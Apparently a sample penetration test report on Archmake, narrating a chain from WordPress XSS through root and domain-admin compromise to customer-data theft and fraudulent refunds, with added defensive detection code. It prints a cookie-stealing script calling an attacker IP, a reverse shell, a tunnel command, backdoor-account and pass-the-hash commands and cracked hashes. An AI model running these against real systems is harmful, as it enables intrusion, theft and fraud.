Executive Summary

Offensive Security has been contracted to conduct a penetration test against Archmake's external web 
presence. The assessment was conducted in a manner that simulated a malicious actor engaged in a 
targeted attack against the company with the goals of: 

o Identifying if a remote attacker could penetrate Archmake's defenses,
o Determining the impact of a security breach on:
    o The integrity of the company's order systems.
    o The confidentiality of the company's customer information.
    o The internal infrastructure and availability of Archmake's information systems.

The assessment was conducted in accordance with the recommendations outlined in NIST SP 800-115 [1].
The results of this assessment will be used by Archmake to drive future decisions as to the direction of
their information security program. All tests and actions were conducted under controlled conditions.

Summary of Results 

Network reconnaissance was conducted against the address space provided by Archmake with the 
understanding that this space would be considered the scope for this engagement. It was determined 
that the company maintains a minimal external presence, consisting of an external web site and a 
hosted mail service. This constituted a small attack surface, necessitating a focus on the primary 
website. 

While reviewing the security of the primary Archmake website, it was discovered that a vulnerable 
WordPress plugin was installed. This plugin was successfully exploited, leading to administrative access 
to the WordPress installation. This access was utilized to obtain interactive access to the underlying 
operating system, and then escalated to root privileges. 

Armed with administrative access to the Archmake webserver, Offensive Security was then able to 
identify internal network resources. A vulnerability in an internal system was leveraged to gain local 
system access, which was then escalated to domain administrator rights. This placed the entire 
infrastructure of the network under the control of the attackers. 



[1] http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
While mapping the internal network, an application was discovered that accessed an internal corporate
database. The application was compromised, and in doing so, allowed Offensive Security to gain access
to the internal database where customer information is stored. Additionally, it was found that this
database system manages customer orders. This system was used to process returns on
attacker-controlled credit cards, allowing Offensive Security to extract funds directly from the company.
Attack Narrative

WordPress Exploitation 

While conducting discovery against the target systems, it was discovered that a WordPress 3.3.1
installation was in place. While this system was being reviewed for security issues, the WPScan [2] tool
was used, which reported that an insecure plugin was in place.

./wpscan.rb --url www.Archmake.com --enumerate p

WordPress Security Scanner by ethicalhack3r.co.uk
Sponsored by the RandomStorm Open Source Initiative

| URL: http://www.Archmake.com/
| Started on Tue Jan 24 18:44:49 2012

[!] The WordPress theme in use is called "twentyeleven".
[!] The WordPress "http://www.Archmake.com/readme.html" file exists.
[!] WordPress version 3.3.1 identified from meta generator.

[+] Enumerating installed plugins ...

Checking for 2892 total plugins... 100% complete.

[+] We found 2 plugins:

Name: relevanssi
Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
Directory listing enabled? Yes.

Name: relevanssi
Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
Directory listing enabled? Yes.

[+] There were 1 vulnerabilities identified from the plugin names:
[!] Relevanssi 2.7.2 Wordpress Plugin Stored XSS Vulnerability
* Reference: http://www.exploit-db.com/exploits/16233/

[+] Finished at Tue Jan 24 18:45:30 2012

As reported by WPScan, the Relevanssi plugin suffered from a cross-site scripting vulnerability [3],
documented on the Exploit Database. This vulnerability was leveraged to conduct a cross-site scripting
attack with the intent of stealing authentication cookies from an administrative user.

[2] http://code.google.com/p/wpscan
[3] http://www.exploit-db.com/exploits/16233/
To conduct this attack, Offensive Security inserted the following code into the search bar on the
Archmake web site:

<script>new Image().src="http://172.16.40.204/p.php?cookie="+document.cookie;</script>

[Screenshot: the payload entered in the site's search box]
For this attack to properly execute, a user logged into the WordPress administrative interface was 
required to access the "User Searches" page. 



[Screenshot: WordPress Dashboard menu with the entries Home, Updates and "User searches"]



When this page was accessed, the cross-site scripting attack was executed. This can be verified by 
accessing the view source option on the "User Searches" page. 



<script>new Image().src="http://172.16.40.204/p.php?cookie="+document.cookie;</script>



At the time that the "User Searches" page was accessed, a remote listener was running on the attacker's 
machine. This captured the logged in user's authentication cookie. 
GET /p.php?cookie=wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588%7C72c3335ad1e783b75bb3d8cf9e85fc9c;
%20wp-settings-time-1=1327925790;%20wordpress_test_cookie=WP+Cookie+check;
%20wordpress_logged_in_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588%7Caf1bcabca49191de76ec45e798ae5ada;
%20wp-settings-1=editor%3Dhtml;%20wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1327599469%7C3ada64cf8e918c9a4bf148896181fc63;
%20wordpress_logged_in_ed8a4e5dd813c7b5d262130b08955a6a=admin HTTP/1.1

This cookie was then manually inserted into Firefox using a cookie editor. This bypassed the login 
function by tricking WordPress into believing the attacker had already successfully authenticated to the 
system. 
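As an added defender-side example (not part of the report), the following Python scans web server access-log lines for the kind of search-box payload shown above, decoding URL encoding repeatedly so double-encoded variants are caught as well. The log lines and the search parameter name "s" are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-format log lines (not taken from the report). Line 2
# carries the same cookie-stealing payload the report describes, URL-encoded as a
# browser would submit it through a search form using the parameter "s" (assumed).
# Line 3 is a double-encoded variant that a single decode would miss.
SAMPLE_LOG = """\
172.16.40.1 - - [24/Jan/2012:18:50:01 +0000] "GET /?s=morphine+script+fonts HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
172.16.40.1 - - [24/Jan/2012:18:51:12 +0000] "GET /?s=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F172.16.40.204%2Fp.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
172.16.40.1 - - [24/Jan/2012:18:53:40 +0000] "GET /?s=%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators of script injection in a request parameter. They are matched against
# the fully decoded, lower-cased value so encoding tricks do not hide them.
INJECTION_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b"),
    "event_handler": re.compile(r"\bon[a-z]+\s*="),
    "javascript_uri": re.compile(r"javascript\s*:"),
    "cookie_access": re.compile(r"document\s*\.\s*cookie"),
}
# An absolute URL inside a payload usually names the collection host.
EXFIL_URL_RE = re.compile(r"https?://([^/\s\"']+)")


def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly until the value stops changing (catches %25 double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(line):
    """Return a finding dict for one access-log line, or None when nothing matched."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw).lower()
        hits = [label for label, rx in INJECTION_PATTERNS.items() if rx.search(value)]
        if not hits:
            continue
        exfil = EXFIL_URL_RE.search(value)
        return {
            "param": name,
            "indicators": hits,
            "exfil_host": exfil.group(1) if exfil else None,
            "decoded": value,
        }
    return None


def scan_log(text):
    """Run inspect_request over every line; findings carry their 1-based line number."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        f = inspect_request(line)
        if f:
            f["line"] = n
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        where = f" exfil to {f['exfil_host']}" if f["exfil_host"] else ""
        print(f"line {f['line']}: param {f['param']!r} -> {', '.join(f['indicators'])}{where}")
```

The extracted collection host is the value to feed into egress blocking and into a search for other administrators' browsers that contacted it.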



[Screenshot: Firefox cookie editor dialog holding the captured wordpress_ed8a4e5dd813c7b5d262130b08955a6a cookie for host www.archmake.com, expiring "at end of session"]



After reloading the web page, it was verified that administrative access had successfully been obtained. 
[Screenshot: www.archmake.com front page showing the WordPress admin bar with "+ New", "Edit Page" and "Howdy, admin"]



Once this level of administrative access was obtained, full control via the WordPress administrative 
interface was possible. This can result in code execution on the site through multiple methods, most 
directly through the editing of the WordPress theme files, which grant access to the underlying PHP 
code. The integrity of the webserver was now compromised, with multiple escalation paths available to 
the attacker. 

For details of the exploited vulnerability, please see Appendix A. 

WordPress Plugin Unintended File Type Upload 

Once administrative access to the WordPress system had been obtained, an effort was made to identify
any additional vulnerabilities that could be leveraged by an attacker. As part of this effort, a review of
the installed plugins was made.

While conducting this review, a plugin was identified that allowed for the uploading of user supplied 
profile images. 



[Screenshot: WordPress Plugins page listing "Admin Upload Plugin", version 0.1, active]





Upon reviewing the source code for this plugin, Offensive Security discovered that a regular expression 
controls the types of files that may be uploaded to the site. 
[Screenshot: Edit Plugins, browsing admin-upload-plugin/admin-upload-plugin.php (active)]

if (isset($_FILES['offsec_user_image']['error']) &&
    $_FILES['offsec_user_image']['error'] === 0) {

    $filename = $_FILES['offsec_user_image']['name'];
    if (preg_match("/^.*\.(bmp|jpeg|gif|png|jpg...
        $filename)) {

(The right edge of the screenshot is cut off after the list of extensions.)



The above section of code from the upload script checks for allowed file types in a flawed manner. The
regular expression performs a simple string evaluation, and it is the only test used to determine the file
type of the object the user is attempting to upload. The intent of the regex is to match a file name such
as "MyImage.png", with the extension portion of the name satisfying the regular expression. However,
because nothing in the expression requires the match to end at the end of the name, files such as
"MyEvilFile.png.php" match as well, allowing the upload of an executable script.

It was decided to leverage this vulnerability to upload attacker-supplied tools and scripts to the targeted
system. There are multiple ways that file transfers could be conducted with the level of access that had
been obtained; however, leveraging this process had the dual benefit of demonstrating an existing
vulnerability on the site and minimizing the changes made to the webserver.
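Added example, not the plugin's code: the visible part of the upload check ported to Python beside a hardened version that anchors the extension, allows a single dot, and confirms the file header. The vulnerable pattern is reconstructed from the screenshot; since its right edge is cut off, the absence of a closing "$" anchor is an assumption consistent with the report's finding.

```python
import re
import secrets

# Reconstruction (assumption) of the plugin's check: nothing anchors the extension
# to the end of the name, so "x.png.php" and "x.php.png" both pass.
VULNERABLE_RE = re.compile(r"^.*\.(bmp|jpeg|gif|png|jpg)", re.IGNORECASE)

# Hardened rule: one dot, an allowed extension as the final component, nothing else.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(bmp|jpeg|gif|png|jpg)$", re.IGNORECASE)

# Leading bytes of the image formats the plugin meant to allow.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "bmp": (b"BM",),
}


def vulnerable_check(filename):
    """What the report's plugin effectively did: accept if the pattern matches anywhere."""
    return bool(VULNERABLE_RE.match(filename))


def hardened_check(filename, content):
    """Accept only when the name, its final extension and the file header all agree."""
    m = SAFE_NAME_RE.match(filename)
    if not m:
        return False
    ext = m.group(1).lower()
    return any(content.startswith(sig) for sig in MAGIC[ext])


def stored_name(filename):
    """Server-chosen name: the client-supplied name never reaches the filesystem."""
    m = SAFE_NAME_RE.match(filename)
    if not m:
        raise ValueError("rejected filename")
    return secrets.token_hex(16) + "." + m.group(1).lower()


# Constructed sample contents: a minimal PNG prefix and a non-image text body.
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
NOT_AN_IMAGE = b"<?php echo 'not an image'; ?>"

if __name__ == "__main__":
    for name, body in (("MyImage.png", PNG_HEADER),
                       ("MyEvilFile.png.php", NOT_AN_IMAGE),
                       ("MyEvilFile.php.png", NOT_AN_IMAGE),
                       ("image.png", NOT_AN_IMAGE)):
        print(f"{name:22} vulnerable={vulnerable_check(name)!s:5} "
              f"hardened={hardened_check(name, body)}")
```

Even with the check fixed, the uploads directory should not be allowed to execute scripts, since the report shows the uploaded PHP file being served and run from it.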



To verify that the upload process worked as intended, a standard graphic file was uploaded as a test.

Name                       Last modified       Size
Parent Directory
face.png                   01-Feb-2012 09:55   103K
Apache/2.2.16 (Debian) Server at www.archmake.com

Once this was completed successfully, Offensive Security modified the name of a PHP reverse shell
(pre-configured to connect back to an Offensive Security controlled system so as to not introduce an
additional security vulnerability) and uploaded it to the system.

Name                       Last modified       Size
Parent Directory
face.png                   01-Feb-2012 09:55   103K
php-reverse-shell.png.php  01-Feb-2012 10:00   5.4K
Apache/2.2.16 (Debian) Server at www.archmake.com

A listener was then run on the attacker-controlled system and the PHP reverse shell was accessed,
resulting in interactive shell access on the remote system. Because this shell was running within the
context of the webserver, it only had minimal system permissions.



root@bt:~# nc -lvp 53
listening on [any] 53 ...
connect to [172.16.40.204] from www.Archmake.com [172.16.40.1] 34850
Linux archwww 2.6.32-5-686 #1 SMP Mon Oct 3 04:15:24 UTC 2011 i686 GNU/Linux
 10:49:14 up 12 days, 23:47,  2 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM     LOGIN@   IDLE    JCPU   PCPU  WHAT
rdole    tty7     :0       16Jan12  12days  5:51   0.24s x-session-manag
rdole    pts/2    :0.0     Tue10    6:01m   0.38s  4.68s gnome-terminal
uid=33(www-data) gid=33(www-data) groups=33(www-data)





For details of the exploited vulnerability, please see Appendix A.

Linux Local Privilege Escalation 

With interactive access to the targeted webserver obtained, the next objective was to gain 
administrative access to the system. 

The operating system of the webserver was determined to be "Linux version 2.6.32-5-686 (Debian
2.6.32-38) (ben@decadent.org.uk) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Mon Oct 3 04:15:24 UTC
2011". After researching potential attack vectors, it was discovered that the system was vulnerable to a
race condition in bzip2. A publicly available exploit [4] for this vulnerability was found on the Exploit
Database.

To escalate privileges, the exploit was uploaded to the system via the insecure profile picture upload
plugin.



[4] http://www.exploit-db.com/exploits/18147
root@bt:~/c# gcc -o race 18147.c
root@bt:~/c# ls -l race
-rwxr-xr-x 1 root root 7729 2012-01-28 20:16 race
root@bt:~/c#

Name                       Last modified       Size
Parent Directory
face.png                   01-Feb-2012 09:55   103K
php-reverse-shell.png.php  01-Feb-2012 10:00   5.4K
race.png.gz                01-Feb-2012 10:28   3.1K
Apache/2.2.16 (Debian) Server at www.archmake.com



It was then a straightforward process of decompressing the executable, providing execute permissions, 
and running the exploit. This resulted in root level access, allowing full control of the entire webserver. 



$ cd /var/www/wp-content/uploads/2012/02
$ ls race.png.gz
race.png.gz
$ gunzip race.png.gz
$ chmod +x race.png
$ ./race.png
usage: ./race.png <cmd name>
$ ./race.png dd
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)



At this point, the webserver represents an internal attack platform for a malicious party. With full 
administrative access now available, a malicious party could utilize the system for a multitude of 
purposes, ranging from attacks against Archmake itself, to attacks against its customers. If this had been 
a true compromise, Archmake administrators would not be able to trust any data on the webserver. 

For details of the exploited vulnerability, please see Appendix A. 
Maintaining Access to Compromised Webserver

Once administrative access to the webserver had been established, further attacks against Archmake 
required a more stable connection than what was provided by the PHP backdoor. 

Upon examining the exploited webserver, it was discovered that an SSH service was running on port 
22000. It was decided that using this service was a better solution for establishing a standard method of 
interaction without introducing additional security vulnerabilities to the system. 

In order to minimize changes to the system, SSH key-based authentication was used for authentication 
rather than altering or adding any user accounts. These keys work as a method of authentication 
through the use of public key cryptography, consisting of a public/private key pair. To enable this access, 
the attacker's public key was added to the authorized_keys file for the root user. Additionally, the public 
key of the web server was copied to the authorized_keys file of the attacking system. 

With the aforementioned authentication system in place, an SSH server was started on the attacker's
system on TCP port 53. We were confident that the webserver would be able to make outbound
connections to the remote system using that port based upon the initial exploit. From the PHP shell
environment, the command

ssh -o 'StrictHostKeyChecking no' -R 22000:127.0.0.1:22000 -p 53 172.16.40.204 ping 127.0.0.1

was executed and initiated a connection from the victim's system to the attacker. Additionally, this 
created a listener on the attacker's system that would tunnel local connections to the listening SSH 
server on the victim's system. 
This tunnel was then utilized to open a standard SSH connection as the root user to the victim web
server. Additionally, a SOCKS proxy was created between the two systems, allowing applications on the
attacker's system to access the victim's network through the proxy. This has the effect of making all
connections appear as if they are coming from the victim's system. This configuration allowed the
attacker to masquerade as the victim's system.

For the purposes of the penetration test, this connection was created manually. In the instance of a true 
attack, it is likely that the attacker would implement an automated process to re-create the tunnels if 
the connection was broken for any reason. 

This phase of the attack did not exploit any vulnerabilities or take advantage of any newly discovered
misconfigurations on the system. It was simply the result of the level of access that had been obtained
on the system through the success of the previous attacks. This is the phase in which the attacker
consolidated the access and control needed to penetrate Archmake's network further. Clearly
understanding this aspect is essential to understanding the scope of the penetration.

Vulnerable Splunk Installation 

While inspecting the configuration of the compromised webserver, references were discovered to a 
10.10.0.x network that appeared to be directly accessible by the compromised system. Network 
reconnaissance steps, used to discover additional assets located on this secondary network, revealed a 
Splunk server. 

Versions of Splunk prior to 4.2.5 suffer from a remote vulnerability that can be exploited with a publicly
available exploit [5] located on the Exploit Database. Using the SOCKS proxy that was previously
established, Offensive Security accessed the web interface of the Splunk installation, and identified that
the installed version was 4.2.2, and thus, vulnerable to attack.



[5] http://www.exploit-db.com/exploits/18245
[Screenshot: Splunk login page at http://10.10.0.3:8000/en-US/account/login, footer reading "© 2005-2012 Splunk Inc. Splunk 4.2.2 build 101277."]



To conduct the attack, the public exploit was transferred to the compromised webserver, and then run 
against the targeted system. This attack is conducted in a blind manner, resulting in no response back 
from the executed commands. Because the remote system was Windows-based, it was decided that an 
attempt would be made to create a user account on the remote system. As Splunk is often installed with 
local SYSTEM privileges, this user would then be added to the Administrators group. 
root@archwww:~/exploit# python splunk_exploit.py -h
Usage: Run splunk_exploit.py -h to see usage options

Options:
  --version            show program's version number and exit
  -h, --help           show this help message and exit
  -t TARGETHOST        IP Address or hostname of target splunk server
  -c                   Generate CSRF URL only
  -f                   Target is configured to use a Free licence and does not permit remote auth
  -W SPLUNKWEB_PORT    The Splunk admin interface port (Default: 8000)
  -d SPLUNKD_PORT      The Splunkd Web API port (Default: 8089)
  -u USERFILE          File containing usernames for use in dictionary attack
  -p PASSFILE          File containing passwords for use in dictionary attack
  -U USERNAME          Admin username (if known)
  -P PASSWORD          Admin pasword (if known)
  -e USERPAIR          Attempt to add admin user via priv up directory traversal magic.
                       Accepts username:password

root@archwww:~/exploit# python splunk_exploit.py -t 10.10.0.3 -i
[i] Splunkd server found. Version: 4.2.2
[i] OS: Windows 0 6
[i] Splunk web interface discovered
[i] CVAL: 1480339707
[i] Configured with free licence. No auth required

[Payload Options]
[1] Pseudo Interactive Shell
[2] Perl Reverse Shell
[3] Command Exec (Blind)
Please select option 1-3: 3
blind_shell>net user hacker t00rt00rt00r! /add
[i] Executing Command: net user hacker t00rt00rt00r! /add
net user hacker t00rt00rt00r! /add
blind_shell>net localgroup administrators hacker /add
[i] Executing Command: net localgroup administrators hacker /add
net localgroup administrators hacker /add



The success of the attack was tested by attempting to use the newly created account to establish an 
interactive session on the targeted system via Windows Remote Desktop. 
With this connection established, we verified that the created account had local administrative access.
At this point, Offensive Security had a level of access equal to sitting at the physical system console of 
the newly compromised host. 

For details of the exploited vulnerability, please see Appendix A. 

Domain Privilege Escalation 

To determine the full potential of this compromise, an attempt was made to escalate privileges from
local administrator to domain administrator. Utilizing the compromised Splunk server, Offensive
Security transferred Windows Credential Editor (WCE) [6] to the remote system through the use of the
compromised webserver. WCE is a tool that allows attackers to make use of Windows credentials from
memory and repurpose them for alternate use.

[6] http://www.ampliasecurity.com/research/wcefaq.html

Upon initial transfer of the WCE toolkit to the system, it was discovered that the Domain Administrator 
token was present within memory. 



[Screenshot: Administrator command prompt]

C:\Users\hacker\Downloads>wce.exe
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Administrator:ARCHMAKE:7191887D06385FE04D080AE3B95CB89D:598A0FC45B201E216D9BE1AD59398436
ARCHMAKE-DHCP$:ARCHMAKE:00000000000000000000000000000000:28EA4CC2836CE4220DF4CB0A9C4E6FF0

C:\Users\hacker\Downloads>_



With this credential in memory, it was a simple matter of using this token to execute a new command 
shell that would operate with Domain Administrator rights. 
[Screenshot: Administrator command prompt]

C:\Users\hacker\Downloads>wce.exe
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Administrator:ARCHMAKE:7191887D06385FE04D080AE3B95CB89D:598A0FC45B201E216D9BE1AD59398436
ARCHMAKE-DHCP$:ARCHMAKE:00000000000000000000000000000000:28EA4CC2836CE4220DF4CB0A9C4E6FF0

C:\Users\hacker\Downloads>wce -s Administrator:ARCHMAKE:7191887D06385FE04D080AE3B95CB89D:598A0FC45B201E216D9BE1AD59398436 -c cmd.exe
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of new logon session 000C435Bh to:
Username: Administrator
domain: ARCHMAKE
LMHash: 7191887D06385FE04D080AE3B95CB89D
NTHash: 598A0FC45B201E216D9BE1AD59398436
NTLM credentials successfully changed!

C:\Users\hacker\Downloads>

[Screenshot: new window "Administrator: C:\Windows\system32\cmd.exe"]

Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows\system32>_



This shell was then used to run the Microsoft Management Console (MMC) as the Domain
Administrator. With the MMC loaded, the Active Directory Users and Computers snap-in was loaded,
giving the attacker the ability to edit domain entities. This was utilized to create a new network user,
which was subsequently added to the Domain Administrators group.
[Screenshot: MMC "Console1 - [Console Root]" with the Active Directory Users and Computers snap-in for archmake.com (ArchmakeOrg, Builtin, Computers, Domain Controllers, ForeignSecurityPrincipals, Microsoft Exchange, Users), launched with "mmc" from the Administrator cmd.exe window (Microsoft Windows [Version 6.0.6002])]




This new user was capable of accessing the entire Archmake Active Directory domain, with full rights 
and privileges. At this point, the integrity of the entire Windows network is compromised. In terms of 
next steps, a true attacker would have multiple tools at their disposal, including: 

o Utilization of Group Policy to deploy backdoor software on all systems. 

o Complete exfiltration of all data stored on any system that uses Windows authentication. 

o Destruction of any and all network resources. 

o Targeted attacks against any and all employees of Archmake, through the use of information 
gathering tools such as keystroke loggers to identify personal information. 

o Leveraging this systemic access to conduct attacks against Archmake suppliers and partners that 
maintain a trust relationship with the company. 

It was determined that while these steps would be possible, they would be considered outside the scope 
of the current engagement. It was demonstrated that a total compromise of the Archmake domain had 
been accomplished with a complete loss of integrity for all local systems. 



For details of the exploited vulnerability, please see Appendix A. 
Database Content Exploitation

After the Splunk server was exploited, an examination of its local file systems revealed a directory 
containing an executable and a CSV file. 



C:\OrderManagement>dir
 Volume in drive C has no label.
 Volume Serial Number is 58BE-8E5C

 Directory of C:\OrderManagement

01/30/2012  05:16 AM    <DIR>          .
01/30/2012  05:16 AM    <DIR>          ..
01/30/2012  05:16 AM            71,199 CurrentExport.csv
01/30/2012  04:25 AM           479,544 exportcsv.exe
               2 File(s)        550,743 bytes
               2 Dir(s)   2,072,174,592 bytes free

C:\OrderManagement>_



Upon investigating the CSV file, it was found to contain Archmake's customer information that had been 
extracted from a database server. 



[Screenshot: CurrentExport.csv opened in Notepad. The file begins with an ODBC status message and then lists one customer per line (first name; last name; street; password; state; postal code):]

Message: [Microsoft][ODBC SQL Server Driver][SQL Server]Changed database context to 'CustomerData'
SQLSTATE: 01000
Aaron;Adams;123 main street;impossible dragon boxing;Alabama;39108;
Adam;Adamson;123 main street;stunning sage maneuver;Alaska;54548;
Adrian;Adler;123 main street;running fox-woman bite;Arizona;95471;
(further rows not reproduced)
It was determined that this file was generated by the exportcsv.exe program. This program was
examined to obtain an understanding of its inner workings, and to determine if it contained any
information that would facilitate access to the database server.

While viewing the program within a debugger, it was discovered that it created a direct connection to a 
Microsoft SQL server. The credentials for this connection were hard coded within the application. 



[Screenshot: OllyDbg CPU view of the main thread of exportcsv.exe, stopped where the program pushes the connection string "DRIVER={SQL Server}; SERVER=10.10.0.5,1433; DATABASE=CustomerData; UID=sa; PWD=..." as an argument (the password value is illegible in the screenshot)]



By making use of these credentials, it was possible to make a direct connection to the backend database 
server to directly access the data. 
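Added example, not from the report: a "strings"-style scan that flags ODBC connection strings carrying an embedded password inside a compiled binary, checking both plain ASCII and the UTF-16LE form Windows programs often use. The sample bytes are constructed, and the password is a placeholder, not the value from the report.

```python
import re

# Constructed stand-in for a compiled exportcsv.exe: filler bytes around one
# connection string stored as ASCII and once more as UTF-16LE. Server, database
# and user name follow the report's screenshot; the password is a placeholder.
CONN = ("DRIVER={SQL Server};SERVER=10.10.0.5,1433;DATABASE=CustomerData;"
        "UID=sa;PWD=PLACEHOLDER_PW;")
SAMPLE_BINARY = (b"MZ\x90\x00" + bytes(range(256)) * 4
                 + CONN.encode("ascii") + b"\x00"
                 + b"\x55" * 300
                 + CONN.encode("utf-16-le") + b"\x00\x00"
                 + b"\x00" * 64)

ASCII_RUN_RE = re.compile(rb"[\x20-\x7e]{8,}")
WIDE_RUN_RE = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")
PASSWORD_KEYS = {"pwd", "password"}


def extract_strings(data):
    """Yield (text, encoding) for printable runs, like 'strings -a' plus 'strings -el'."""
    for m in ASCII_RUN_RE.finditer(data):
        yield m.group().decode("ascii"), "ascii"
    for m in WIDE_RUN_RE.finditer(data):
        yield m.group().decode("utf-16-le"), "utf-16le"


def parse_connection_string(text):
    """Return lower-cased key -> value pairs if text looks like a connection string."""
    parts = [p for p in text.split(";") if "=" in p]
    if len(parts) < 3:
        return None
    kv = {}
    for part in parts:
        key, _, value = part.partition("=")
        kv[key.strip().lower()] = value.strip()
    if "server" not in kv and "data source" not in kv:
        return None
    return kv


def find_embedded_credentials(data):
    """Report connection strings that carry a password; the secret itself is not returned."""
    findings = []
    for text, enc in extract_strings(data):
        kv = parse_connection_string(text)
        if not kv:
            continue
        secret_keys = [k for k in kv if k in PASSWORD_KEYS and kv[k]]
        if not secret_keys:
            continue
        findings.append({
            "encoding": enc,
            "server": kv.get("server") or kv.get("data source"),
            "database": kv.get("database") or kv.get("initial catalog"),
            "user": kv.get("uid") or kv.get("user id"),
            "password_length": len(kv[secret_keys[0]]),
        })
    return findings


if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_BINARY):
        print(f"{f['encoding']:8} server={f['server']} db={f['database']} "
              f"user={f['user']} password of {f['password_length']} chars embedded")
```

A hit on the "sa" account, as in the report, is two findings in one: a secret shipped inside a binary and an export job running with full server privileges instead of a read-only account.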



[Screenshot: SQL Server Management Studio Object Explorer connected to 192.168.114.45 (SQL Server 10.0.1600) as sa, showing the CustomerData database with the tables dbo.accounts and dbo.CustomerInfo]



This access allowed us to directly manipulate all data within the database. 
[Screenshot: query results (rows 11 to 20) with the columns id, First Name, Last Name, eMail, Phone Nbr and AcctNb]

Utilizing this connection, an export of the database was performed. This resulted in a significant
compromise of customer data. Fields that were extracted included: UserID, first and last name, e-mail
address, telephone number, encrypted password, mailing address, and various bits of user information.



[Screenshot: exported rows showing first name, last name, e-mail address, telephone number, account number, user name and a 32-character hexadecimal password field]

After examining the output, it was determined that the password field was composed of MD5 hashes. 
These hashes were loaded into a password cracker operated by Offensive Security. Out of the 1000 
loaded hashes, 996 were recovered to clear text in twenty-two seconds of operation. 
Hashes: 1002

Unique digests: 1000

Bitmaps: 13 bits, 8192 entries, 0x00001fff mask, 32768 bytes
Rules: 1
GPU-Loops: 128
GPU-Accel: 40

Password lengths range: 1-15
Platform: AMD compatible platform found
Watchdog: Temperature limit set to 90c
Device #1: Cayman, 2048MB, 0Mhz, 22MCU
Device #2: Cayman, 2048MB, 0Mhz, 22MCU
Device #1: Allocating 132MB host-memory
Device #1: Kernel ./kernels/4098/m0000_a0.Cayman.64.kernel (1132724 bytes)
Device #2: Allocating 132MB host-memory
Device #2: Kernel ./kernels/4098/m0000_a0.Cayman.64.kernel (1132724 bytes)

Scanned dictionary /pentest/passwords/wordlists/hatelist.txt: 2712389526
bytes, 232438151 words, 232438151 keyspace, starting attack...

9d72aa552f6628526ab1e193d4aa0f2b:abode
7e84b7b8d1c678647abafd23449a1db1:acqua
79e3d51a81199a960a370f6e4f0ba40c:abnormal
616efb73c7fc429cd5189f7f95d72746:adige
8d8bfbd10b5f6d48eb9691bb4871de62:admit
3b7770f7743e8f01f0fd807f304a21d0:adjust
c9fe0bd5322a98e0e46ea09d2c319cd2:aflame
bda059e1d21467e68b86d5b33ff78fc1:absentminded
e43fd1f89dbc258fe651ac8ecaa7a61a:admonition

Status.......: Exhausted
Input.Mode...: File (/pentest/passwords/wordlists/hatelist.txt)
Hash.Type....: MD5
Time.Running.: 22 secs
Time.Left....: 0 secs
Time.Util....: 22084.0ms/17923.2ms Real/CPU, 430.8% idle
Speed........: 10060.4k c/s Real, 67185.3k c/s GPU
Recovered....: 996/1000 Digests, 0/1 Salts
Progress.....: 232438151/232438151 (100.00%)
Rejected.....: 10264581/232438151 (4.42%)
HW.Monitor.#1: 0% GPU, 51c Temp
HW.Monitor.#2: 0% GPU, 44c Temp

Started: Tue Jan 31 13:43:05 2012
Stopped: Tue Jan 31 13:43:37 2012



The effect of this amounts to a serious compromise. The volume of personal information extracted from 
the database, combined with the common tendency for password re-use, could significantly impact the 
customers of Archmake had this been a real attack. 



For details of the exploited vulnerability, please see Appendix A. 
Attacker Control of Archmake Transactions 

While conducting further examination of the database backend, we determined that a number of tables 
were being updated on a regular basis. By monitoring the activity of these tables, it was discovered that 
as orders were entered into the system, they would be placed into the tables. On a periodic basis, 
another process would take action based upon the "Category". 



CustID    CreditCard          Category   Amount
448917    4716428624251690    1          326,450.06
27362S    4916350995365090    4          544,382.49
170117    4532665952205720    6          339,151.73
623596    4532876975411010    1          319,276.63



Through a combination of monitoring database activity and placing orders through the standard 
system, it was possible to identify the purpose of a subset of Categories. 



Category   Purpose
1          Standard order, Card charged
2          Unknown
3          Rush order, Card charged
4          Refund, Card refunded funds
5          Unknown
6          Internal order



Once a mapping of transaction types was created, an attempt was made to manually inject data into this 
table. It was discovered that by injecting a valid CustID and an attacker-owned credit card number with a 
category of 4 (Refund), an arbitrary amount of money could be refunded to the attackers. This was 
verified in cooperation with Archmake under controlled conditions. 

